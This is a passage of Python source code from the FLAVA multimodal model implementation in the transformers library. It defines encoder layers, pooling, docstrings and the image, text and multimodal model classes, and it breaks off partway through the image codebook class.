super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# Copied from transformers.models.vit.modeling_vit.ViTOutput.forward
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = hidden_states + input_tensor
return hidden_states
class FlavaLayer(nn.Module):
"""This corresponds to the Block class in the timm implementation."""
def __init__(self, config: FlavaPossibleConfigs) -> None:
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = FlavaAttention(config)
self.intermediate = FlavaIntermediate(config)
self.output = FlavaOutput(config)
# TODO: Check fp32 layer norm possiblity
self.layernorm_before = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.layernorm_after = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
self_attention_outputs = self.attention(
self.layernorm_before(hidden_states), # in ViT, layernorm is applied before self-attention
attention_mask=attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
# first residual connection
hidden_states = attention_output + hidden_states
# in ViT, layernorm is also applied after self-attention
layer_output = self.layernorm_after(hidden_states)
layer_output = self.intermediate(layer_output)
# second residual connection is done here
layer_output = self.output(layer_output, hidden_states)
outputs = (layer_output,) + outputs
return outputs
class FlavaEncoder(nn.Module):
def __init__(self, config: FlavaConfig) -> None:
super().__init__()
self.config = config
self.layer = nn.ModuleList([FlavaLayer(config) for _ in range(config.num_hidden_layers)])
self.gradient_checkpointing = False
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
) -> Union[tuple, BaseModelOutput]:
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
attention_mask,
layer_head_mask,
)
else:
layer_outputs = layer_module(hidden_states, attention_mask, layer_head_mask, output_attentions)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, all_hidden_states, all_self_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_self_attentions
)
class FlavaPooler(nn.Module):
def __init__(self, config: FlavaPossibleConfigs):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states: torch.Tensor):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
FLAVA_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`{config}`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
FLAVA_INPUTS_DOCSTRING_COMMON = r"""
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
FLAVA_IMAGE_INPUTS_DOCSTRING_BASE = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`FlavaImageProcessor.__call__`] for details.
bool_masked_pos (`torch.BoolTensor` of shape `(batch_size, image_num_patches)`):
Boolean masked positions. Indicates which patches are masked (1) and which aren't (0).
interpolate_pos_encoding (`bool`, *optional*):
Whether to interpolate the pre-trained position encodings.
"""
FLAVA_IMAGE_INPUTS_DOCSTRING = FLAVA_IMAGE_INPUTS_DOCSTRING_BASE + FLAVA_INPUTS_DOCSTRING_COMMON
FLAVA_TEXT_INPUTS_DOCSTRING_BASE = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary. Indices can be obtained using [`AutoTokenizer`]. See
[`PreTrainedTokenizer.encode`] and [`PreTrainedTokenizer.__call__`] for details. [What are input
IDs?](../glossary#input-ids)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
"""
FLAVA_TEXT_INPUTS_DOCSTRING = FLAVA_TEXT_INPUTS_DOCSTRING_BASE + FLAVA_INPUTS_DOCSTRING_COMMON
FLAVA_MULTIMODAL_INPUTS_DOCSTRING = (
r"""
Args:
hidden_states (`torch.FloatTensor` of shape `(batch_size, image_num_patches + text_seq_len, hidden_size)`):
The concatenated hidden states of unimodal encoders.
"""
+ FLAVA_INPUTS_DOCSTRING_COMMON
)
FLAVA_MODEL_INPUTS_DOCSTRING_BASE = r"""
Args:
skip_multimodal_encoder (*bool*, *optional*):
Skip any calculations for multimodal encoder. Useful if multimodal encoding is not going to be used.
"""
FLAVA_MODEL_INPUTS_DOCSTRING = (
FLAVA_IMAGE_INPUTS_DOCSTRING_BASE
+ FLAVA_TEXT_INPUTS_DOCSTRING_BASE
+ FLAVA_INPUTS_DOCSTRING_COMMON
+ FLAVA_MODEL_INPUTS_DOCSTRING_BASE
)
FLAVA_PRETRAINING_INPUTS_DOCSTRING = (
r"""
Args:
input_ids_masked (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary. These ones are the masked version of the original task
to be used with MLM. Indices can be obtained using [`AutoTokenizer`] along with
[`DataCollatorForMaskedLanguageModeling`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details. [What are input IDs?](../glossary#input-ids)
"""
+ FLAVA_TEXT_INPUTS_DOCSTRING_BASE
+ FLAVA_IMAGE_INPUTS_DOCSTRING_BASE
+ r"""
image_attention_mask (`torch.FloatTensor` of shape `({1})`, *optional*):
Mask to avoid performing attention on padding token indices specifically for images. Mask values selected
in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
skip_unmasked_multimodal_encoder (*bool*, *optional*):
Skip any calculations for multimodal encoder for unmasked inputs. FLAVA pretraining doesn't need unmasked
multimodal embeddings or outputs as of now.
mlm_labels (`torch.LongTensor` of shape `(batch_size, text_seq_len)`, *optional*):
Labels for computing the left-to-right language and multimodal masked modeling loss (next word prediction).
Indices should be in `[-100, 0, ..., text_config.vocab_size - 1]` (see `input_ids` docstring). Tokens with
indices set to `-100` are ignored (masked), the loss is only computed for the tokens with labels in `[0,
..., text_config.vocab_size - 1]`.
mim_labels (`torch.LongTensor` of shape `(batch_size, image_num_patches)`, *optional*):
Labels for computing the image and multimodal masked modeling loss. Indices should be in `[-100, 0, ...,
image_config.vocab_size - 1]`. Tokens with indices set to `-100` are ignored (masked), the loss is only
computed for the tokens with labels in `[0, ..., image_config.vocab_size - 1]`. If not passed, they are
generated automatically using the image codebook assigned to the model. By default, it uses
[`FlavaImageCodebook`]. See [`FlavaImageCodebook`] to understand how to generate mim_labels.
itm_labels (`torch.LongTensor` of shape `(batch_size, 1)`, *optional*):
Labels for computing the image-text matching loss. 0 means the pairs don't match and 1 means they match.
The pairs with 0 will be skipped for calculation of MMM and global contrastive losses as well.
return_loss (`bool`, *optional*, default to None):
Whether to return calculated loss or not.
"""
+ FLAVA_INPUTS_DOCSTRING_COMMON
)
FLAVA_PRETRAINING_START_DOCSTRING_EXTRA = r"""
Parameters:
image_codebook ([`nn.Module`]): If passed, the image codebook will be set to this. Otherwise. it will
be initialized using the image_codebook_config defined in the config first as the first parameter.
"""
class FlavaPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = FlavaConfig
base_model_prefix = "flava"
supports_gradient_checkpointing = True
def _init_weights(self, module: Union[nn.Linear, nn.Conv2d, nn.LayerNorm]) -> None:
"""Initialize the weights"""
if isinstance(module, (nn.Linear, nn.Conv2d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def _set_gradient_checkpointing(self, module: FlavaEncoder, value: bool = False) -> None:
if isinstance(module, FlavaEncoder):
module.gradient_checkpointing = value
@add_start_docstrings(
"The bare FLAVA Image Model transformer outputting raw hidden-states without any specific head on top.",
FLAVA_START_DOCSTRING.format(config="FlavaImageConfig"),
)
class FlavaImageModel(FlavaPreTrainedModel):
config_class = FlavaImageConfig
# This override allows us to load FlavaImageModel from FlavaModel/FlavaForPreTraining checkpoints.
base_model_prefix = "flava.image_model"
main_input_name = "pixel_values"
def __init__(self, config: FlavaImageConfig, add_pooling_layer: bool = True):
super().__init__(config)
self.config = config
self.embeddings = FlavaImageEmbeddings(config)
self.encoder = FlavaEncoder(config)
self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.pooler = FlavaPooler(config) if add_pooling_layer else None
self.post_init()
def get_input_embeddings(self) -> nn.Module:
return self.embeddings.patch_embeddings
def set_input_embeddings(self, value: nn.Module):
self.embeddings.patch_embeddings = value
def _prune_heads(self, heads_to_prune: Dict[int, List[int]]) -> None:
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(FLAVA_IMAGE_INPUTS_DOCSTRING.format("batch_size, image_num_patches"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPooling,
config_class=_CONFIG_CLASS_FOR_IMAGE_MODEL_DOC,
modality="vision",
expected_output=_EXPECTED_IMAGE_OUTPUT_SHAPE,
)
def forward(
self,
pixel_values: Optional[torch.Tensor] = None,
bool_masked_pos: Optional[torch.BoolTensor] = None,
interpolate_pos_encoding: Optional[bool] = None,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[tuple, BaseModelOutputWithPooling]:
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
pixel_values, bool_masked_pos=bool_masked_pos, interpolate_pos_encoding=interpolate_pos_encoding
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
sequence_output = self.layernorm(sequence_output)
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPooling(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The bare FLAVA Text Model transformer outputting raw hidden-states without any specific head on top.",
FLAVA_START_DOCSTRING.format(config="FlavaTextConfig"),
)
class FlavaTextModel(FlavaPreTrainedModel):
config_class = FlavaTextConfig
# This override allows us to load FlavaTextModel from FlavaModel/FlavaForPreTraining checkpoints.
base_model_prefix = "flava.text_model"
def __init__(self, config: FlavaTextConfig, add_pooling_layer: bool = True):
super().__init__(config)
self.config = config
self.embeddings = FlavaTextEmbeddings(config)
self.encoder = FlavaEncoder(config)
self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.pooler = FlavaPooler(config) if add_pooling_layer else None
self.post_init()
def get_input_embeddings(self) -> PatchEmbeddings:
return self.embeddings.word_embeddings
def set_input_embeddings(self, value: nn.Module):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune: Dict[int, List[int]]) -> None:
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(FLAVA_TEXT_INPUTS_DOCSTRING.format("batch_size, text_seq_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPooling,
config_class=_CONFIG_CLASS_FOR_TEXT_MODEL_DOC,
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[tuple, BaseModelOutputWithPooling]:
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is None:
raise ValueError("You have to specify input_ids")
input_shape = input_ids.size()
if attention_mask is None:
attention_mask = torch.ones(input_shape, device=input_ids.device)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(
attention_mask, input_shape, input_ids.device
)
embedding_output = self.embeddings(
input_ids=input_ids,
token_type_ids=token_type_ids,
position_ids=position_ids,
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
sequence_output = self.layernorm(sequence_output)
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPooling(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The bare FLAVA Multimodal Model transformer outputting raw hidden-states without any specific head on top.",
FLAVA_START_DOCSTRING.format(config="FlavaMultimodalConfig"),
)
class FlavaMultimodalModel(FlavaPreTrainedModel):
config_class = FlavaMultimodalConfig
# This override allows us to load FlavaMultimodalModel from FlavaModel/FlavaForPreTraining checkpoints.
base_model_prefix = "flava.multimodal_model"
main_input_name = "hidden_states"
def __init__(self, config: FlavaMultimodalConfig, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.use_cls_token = self.config.use_cls_token
if self.use_cls_token:
self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
self.encoder = FlavaEncoder(config)
self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.pooler = FlavaPooler(config) if add_pooling_layer else None
self.post_init()
def _prune_heads(self, heads_to_prune: Dict[int, List[int]]) -> None:
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(
FLAVA_MULTIMODAL_INPUTS_DOCSTRING.format("batch_size, image_num_patches + text_seq_len")
)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPooling,
config_class=_CONFIG_CLASS_FOR_MULTIMODAL_MODEL_DOC,
)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[tuple, BaseModelOutputWithPooling]:
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
batch_size, seq_length, _ = hidden_states.size()
if self.use_cls_token:
cls_tokens = self.cls_token.expand(batch_size, -1, -1)
hidden_states = torch.cat((cls_tokens, hidden_states), dim=1)
seq_length += 1
if attention_mask is None:
attention_mask = torch.ones((batch_size, seq_length), device=hidden_states.device)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(
attention_mask, (batch_size, seq_length), hidden_states.device
)
encoder_outputs = self.encoder(
hidden_states,
attention_mask=extended_attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
sequence_output = self.layernorm(sequence_output)
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPooling(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The bare FLAVA Model transformer outputting raw hidden-states without any specific head on top.",
FLAVA_START_DOCSTRING.format(config="FlavaConfig"),
)
class FlavaModel(FlavaPreTrainedModel):
config_class = FlavaConfig
def __init__(self, config: FlavaConfig):
super().__init__(config)
if not isinstance(config.text_config, FlavaTextConfig):
raise ValueError(
"config.text_config is expected to be of type FlavaTextConfig but is of type"
f" {type(config.text_config)}."
)
if not isinstance(config.image_config, FlavaImageConfig):
raise ValueError(
"config.image_config is expected to be of type FlavaImageConfig but is of type"
f" {type(config.image_config)}."
)
if not isinstance(config.multimodal_config, FlavaMultimodalConfig):
raise ValueError(
"config.multimodal_config is expected to be of type FlavaMultimodalConfig but "
+ f"is of type {type(config.multimodal_config)}."
)
text_config = config.text_config
image_config = config.image_config
multimodal_config = config.multimodal_config
self.projection_dim = config.projection_dim
self.text_hidden_size = text_config.hidden_size
self.image_hidden_size = image_config.hidden_size
self.mm_hidden_size = multimodal_config.hidden_size
self.text_model = FlavaTextModel(text_config)
self.image_model = FlavaImageModel(image_config)
self.multimodal_model = FlavaMultimodalModel(multimodal_config)
self.image_projection = nn.Linear(self.image_hidden_size, self.projection_dim)
self.text_projection = nn.Linear(self.text_hidden_size, self.projection_dim)
self.logit_scale = nn.Parameter(torch.ones([]) * self.config.logit_scale_init_value)
self.image_to_mm_projection = nn.Linear(self.image_hidden_size, self.mm_hidden_size)
self.text_to_mm_projection = nn.Linear(self.text_hidden_size, self.mm_hidden_size)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(FLAVA_TEXT_INPUTS_DOCSTRING.format("batch_size, text_seq_length"))
def get_text_features(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> torch.FloatTensor:
r"""
Returns:
text_features (`torch.FloatTensor` of shape `(batch_size, output_dim`): The text embeddings obtained by
applying the projection layer to the pooled output of [`FlavaTextModel`].
Examples:
```python
>>> from transformers import AutoProcessor, FlavaModel
>>> model = FlavaModel.from_pretrained("{0}")
>>> processor = AutoProcessor.from_pretrained("{0}")
>>> inputs = processor(
... text=["a photo of a cat", "a photo of a dog"], max_length=77, padding="max_length", return_tensors="pt"
... )
>>> text_features = model.get_text_features(**inputs)
```""".format(
_CHECKPOINT_FOR_DOC
)
text_outputs = self.text_model(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = text_outputs[0] # last_hidden_state
text_features = self.text_projection(pooled_output)
return text_features
@add_start_docstrings_to_model_forward(FLAVA_IMAGE_INPUTS_DOCSTRING.format("batch_size, image_num_patches"))
def get_image_features(
self,
pixel_values: Optional[torch.Tensor] = None,
bool_masked_pos: Optional[torch.BoolTensor] = None,
interpolate_pos_encoding: Optional[bool] = None,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> torch.FloatTensor:
r"""
Returns:
image_features (`torch.FloatTensor` of shape `(batch_size, output_dim`): The image embeddings obtained by
applying the projection layer to the pooled output of [`FlavaImageModel`].
Examples:
```python
>>> from PIL import Image
>>> import requests
>>> from transformers import AutoProcessor, FlavaModel
>>> model = FlavaModel.from_pretrained("{0}")
>>> processor = AutoProcessor.from_pretrained("{0}")
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> inputs = processor(images=image, return_tensors="pt")
>>> image_features = model.get_image_features(**inputs)
```""".format(
_CHECKPOINT_FOR_DOC
)
image_outputs = self.image_model(
pixel_values=pixel_values,
bool_masked_pos=bool_masked_pos,
attention_mask=attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
interpolate_pos_encoding=interpolate_pos_encoding,
return_dict=return_dict,
)
pooled_output = image_outputs[0] # last_hidden_state
image_features = self.image_projection(pooled_output)
return image_features
@add_start_docstrings_to_model_forward(
FLAVA_MODEL_INPUTS_DOCSTRING.format("batch_size, image_num_patches + text_seq_len")
)
@replace_return_docstrings(output_type=FlavaModelOutput, config_class=FlavaConfig)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
pixel_values: Optional[torch.FloatTensor] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
bool_masked_pos: Optional[torch.Tensor] = None,
position_ids: Optional[torch.LongTensor] = None,
image_attention_mask: Optional[torch.Tensor] = None,
skip_multimodal_encoder: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: bool = True,
return_dict: Optional[bool] = None,
) -> Union[Tuple, FlavaOutput]:
r"""
Returns:
Examples:
```python
>>> from PIL import Image
>>> import requests
>>> from transformers import AutoProcessor, FlavaModel
>>> model = FlavaModel.from_pretrained("facebook/flava-full")
>>> processor = AutoProcessor.from_pretrained("facebook/flava-full")
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> inputs = processor(text=["a photo of a cat"], images=image, return_tensors="pt", padding=True)
>>> outputs = model(**inputs)
>>> logits_per_image = outputs.contrastive_logits_per_image # this is the image-text similarity score
>>> probs = logits_per_image.softmax(dim=1) # we can take the softmax to get the label probabilities
```
"""
return_dict = return_dict if return_dict is not None else self.config.return_dict
if not output_hidden_states:
raise ValueError("FLAVA model requires hidden states to work. Please set `output_hidden_states=True`")
image_embeddings = None
image_states = None
image_mm_projection = None
image_output = None
if pixel_values is not None:
image_output = self.image_model(
pixel_values=pixel_values,
bool_masked_pos=bool_masked_pos,
attention_mask=image_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
image_embeddings, image_states = image_output[0], image_output[2]
# Note that these states don't use final layernorm in the transformer model
image_mm_projection = self.image_to_mm_projection(image_states[-1])
text_embeddings = None
text_states = None
text_mm_projection = None
text_output = None
if input_ids is not None:
text_output = self.text_model(
input_ids=input_ids,
attention_mask=attention_mask,
position_ids=position_ids,
token_type_ids=token_type_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
text_embeddings, text_states = text_output[0], text_output[2]
# Note that these states don't use final layernorm in the transformer model
text_mm_projection = self.text_to_mm_projection(text_states[-1])
multimodal_embeddings = None
multimodal_output = None
if image_mm_projection is not None and text_mm_projection is not None and not skip_multimodal_encoder:
multimodal_input = torch.cat([image_mm_projection, text_mm_projection], dim=1)
multimodal_output = self.multimodal_model(multimodal_input, return_dict=return_dict)
multimodal_embeddings = multimodal_output[0]
if not return_dict:
return (
image_embeddings,
image_output,
text_embeddings,
text_output,
multimodal_embeddings,
multimodal_output,
)
return FlavaModelOutput(
image_embeddings=image_embeddings,
image_output=image_output,
text_embeddings=text_embeddings,
text_output=text_output,
multimodal_embeddings=multimodal_embeddings,
multimodal_output=multimodal_output,
)
class FlavaImageCodebookResPath(nn.Module):
def __init__(self, in_size: int, out_size: int, **kwargs):
super().__init__()
hid_size = out_size // 4
path = OrderedDict()
path["relu_1"] = nn.ReLU()
path["conv_1"] = nn.Conv2d(in_size, hid_size, kernel_size=3, padding=1)
path["relu_2"] = nn.ReLU()
path["conv_2"] = nn.Conv2d(hid_size, hid_size, kernel_size=3, padding=1)
path["relu_3"] = nn.ReLU()
path["conv_3"] = nn.Conv2d(hid_size, hid_size, kernel_size=3, padding=1)
path["relu_4"] = nn.ReLU()
path["conv_4"] = nn.Conv2d(hid_size, out_size, kernel_size=1, padding=0)
self.path = nn.Sequential(path)
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.path(x)
class FlavaImageCodebookBlock(nn.Module):
def __init__(self, in_size: int, out_size: int, num_layers: int, **kwargs):
super().__init__()
self.post_gain = 1 / (num_layers**2)
if in_size != out_size:
self.id_path = nn.Conv2d(in_size, out_size, kernel_size=1, padding=0)
else:
self.id_path = nn.Identity()
self.res_path = FlavaImageCodebookResPath(in_size, out_size)
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.id_path(x) + self.post_gain * self.res_path(x)
class FlavaImageCodebookLayerGroup(nn.Module):
def __init__(self, num_blocks: int, num_layers: int, in_size: int, out_size: int, use_pool: bool = True):
super().__init__()
blocks = OrderedDict()
for i in range(num_blocks):
if i == 0:
blocks[f"block_{i+1}"] = FlavaImageCodebookBlock(in_size, out_size, num_layers)
else:
blocks[f"block_{i+1}"] = FlavaImageCodebookBlock(out_size, out_size, num_layers)
if use_pool:
blocks["pool"] = nn.MaxPool2d(kernel_size=2)
self.group = nn.Sequential(blocks)
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.group(x)
# Inspired by DALLE Encoder in https://github.com/openai/DALL-E/blob/5be4b236bc3ade6943662354117a0e83752cc322/dall_e/encoder.py#L42
@add_start_docstrings(
"""
The FLAVA's image codebook model inspired from DALL-E's original encoder. Outputs raw hidden states and can be used
to generate image tokens for an image based on DALL-E's vocab. Used to generate labels for MIM. Use
`get_codebook_indices` to get image tokens for an image.
""",
FLAVA_START_DOCSTRING.format(config="FlavaImageCodebookConfig"),
)
class FlavaImageCodebook(FlavaPreTrainedModel):
base_model_prefix = ""
config_class = FlavaImageCodebookConfig
main_input_name = "pixel_values"
supports_gradient_checkpointing = False
def __init__(
self,
config: FlavaImageCodebookConfig,
**kwargs: Any,
):
super().__init__(config)
self.config = config
self.num_groups = config.num_groups
self.input_channels = config.input_channels
self.num_blocks_per_group = config.num_blocks_per_group
self.hidden_size = config.hidden_size
